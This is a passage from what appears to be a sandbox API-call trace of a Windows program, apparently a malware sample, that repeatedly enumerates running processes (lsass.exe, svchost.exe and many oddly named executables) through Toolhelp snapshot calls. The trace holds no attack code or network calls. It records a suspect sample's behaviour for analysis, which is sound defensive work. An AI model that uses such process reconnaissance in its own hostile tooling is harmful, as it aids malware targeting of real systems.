lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0107.986] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0107.987] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.988] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.988] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.989] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.989] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.990] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0107.991] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.992] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.993] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0107.994] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.996] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.997] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0107.999] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0108.000] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0108.002] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.003] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.005] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0108.006] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0108.008] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0108.058] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0108.060] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0108.061] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0108.063] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0108.064] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0108.065] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0108.066] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0108.067] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0108.070] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0108.071] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0108.073] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0108.074] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0108.075] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0108.077] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0108.078] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0108.079] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0108.081] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0108.082] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.084] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0108.085] CloseHandle (hObject=0xc4) returned 1 [0108.085] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0108.091] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.092] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0108.093] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0108.093] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.094] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0108.095] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.096] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0108.096] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0108.097] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0108.098] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0108.099] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.099] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.100] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.101] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.102] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.105] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0108.106] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.106] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.107] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0108.108] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.109] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.111] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0108.112] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0108.113] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0108.114] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.116] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.117] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0108.118] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0108.120] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0108.121] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0108.122] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0108.123] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0108.124] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0108.125] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0108.127] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0108.128] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0108.129] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0108.130] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0108.131] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0108.132] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0108.133] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0108.135] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0108.136] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 